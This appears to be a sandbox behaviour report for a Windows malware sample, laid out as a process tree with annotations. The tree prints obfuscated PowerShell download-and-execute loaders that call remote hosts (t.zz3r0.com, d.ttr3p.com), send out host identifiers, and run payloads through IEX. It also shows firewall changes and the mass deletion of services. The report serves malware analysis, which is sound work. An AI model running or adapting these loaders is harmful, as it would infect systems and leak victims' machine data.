        [5] C:\Windows\system32\netsh.exe
            netsh.exe firewall add portopening tcp 65529 SDNSd
      [4] C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
      [4] C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
      [4] C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
[1] C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
[1] C:\Windows\system32\taskeng.exe
    taskeng.exe {6C3F046A-A24A-450C-8E89-71042E45AF3C} S-1-5-18:NT AUTHORITY\System:Service:
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|biJkcCEA.exe -
        - Loads dropped DLL
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exe
          biJkcCEA.exe -
          - Executes dropped EXE
          - Drops file in System32 directory
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\f5hj1zbh\f5hj1zbh.cmdline"
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES279D.tmp" "c:\Windows\Temp\f5hj1zbh\CSCC9AA070B58D04584A89E871DCB5677EF.TMP"
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\nmvk3spo\nmvk3spo.cmdline"
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES2F3B.tmp" "c:\Windows\Temp\nmvk3spo\CSC7FDDEC82A16F489D8239AB599BAC44.TMP"
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\cfmypwl0\cfmypwl0.cmdline"
            [7] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESE531.tmp" "c:\Windows\Temp\cfmypwl0\CSCEBFE6450C2224554919A2F1BB96461F.TMP"
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\ruaz535h\ruaz535h.cmdline"
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESB7DA.tmp" "c:\Windows\Temp\ruaz535h\CSC228D84EF599C4C40B0A4591652A9E121.TMP"
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\frp2jgjf\frp2jgjf.cmdline"
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES35C0.tmp" "c:\Windows\Temp\frp2jgjf\CSCFB632C7FC5C4E23AEA7715F7D6C75D2.TMP"
        [5] C:\Windows\system32\ipconfig.exe
            "C:\Windows\system32\ipconfig.exe" /all
            - Gathers network information
        [5] C:\Windows\system32\ipconfig.exe
            "C:\Windows\system32\ipconfig.exe" /displaydns
            - Gathers network information
        [5] C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -ano
            - Gathers network information
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|biJkcCEA.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe
        - Loads dropped DLL
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exe
          biJkcCEA.exe -
          - Executes dropped EXE
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2788 -s 1876
            - Loads dropped DLL
            - Program crash
            - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\system32\cmd.exe
          cmd /c copy /y C:\Windows\TEMP\m6.bin.ori C:\Windows\TEMP\m6.bin.exe
      [4] C:\Windows\TEMP\m6.bin.exe
          C:\Windows\TEMP\m6.bin.exe
          - Executes dropped EXE
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|biJkcCEA.exe -3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j3wn4yby\j3wn4yby.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESD72D.tmp" "c:\Windows\Temp\j3wn4yby\CSCAFD0837FE44847118E3FE9B1E05923A5.TMP"6⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config lsass Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config system Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config CLR Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config \gm Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config National Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SxS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WebServers5⤵
